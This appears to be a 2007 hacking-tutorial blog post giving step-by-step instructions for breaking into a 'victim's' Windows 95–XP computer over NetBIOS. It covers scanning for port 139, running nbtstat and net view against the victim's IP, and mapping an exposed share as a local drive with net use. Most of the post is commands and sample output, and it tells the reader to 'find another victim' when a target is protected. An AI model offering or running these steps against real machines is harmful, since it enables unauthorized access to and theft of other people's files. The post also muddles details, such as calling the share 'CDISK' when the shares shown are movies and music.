Google
 

Tuesday, February 6, 2007

NetBios hacking for windows 95/98/ME/NT/XP

Step 1: Get a IP (range) scanner. (superscanner is a fast one, get it here).Scan the victim’s ip on TCP/IP port 139 (More info about TCP/IP port here)
Step 2:Open a dos prompt.Do this by going to start/run enter command.com (or cmd) and press ok. this is what you see: c:\windows> This is what you need to type down: Replace 192.168.0.1 with the victims IP address.
c:\windows>nbtstat -a 192.168.0.1
If you see this your in:
NetBIOS Remote Machine Name Table

Name Type Status
—————————————————————
user UNIQUE Registered
workgroup GROUP Registered
user UNIQUE Registered
user UNIQUE Registered
MAC Address = xx-xx-xx-xx-xx-xx

—————————————————————
If you don’t get the number .The victim disabled the File And Printer Sharing, find another victim.


Step 3:type down:
c:\windows>net view
\\192.168.0.1
if the output is like this:
Shared resources at
\\192.168.0.1 "ComputerNameGoesHere"
Sharename Type Used as Comment
————————————————————

movies Disk xxxxx xxxxx
music Disk xxxxx xxxxx

The command completed successfully. “DISK” shows that the victim is sharing a Disk named as CDISK
Step 4: type down:you can replace x: by anything letter yopu want but not your own drive letters.CDISK is the name of the shared harddrive.
c:\windows>net use x:
\\192.168.0.1\movies
If the command is successful we will get the confirmation.The command was completed successfullly
Now open windows explorer or just double click on the My Computer icon on yourdesktop and you will see a new network drive X:\> .

No comments: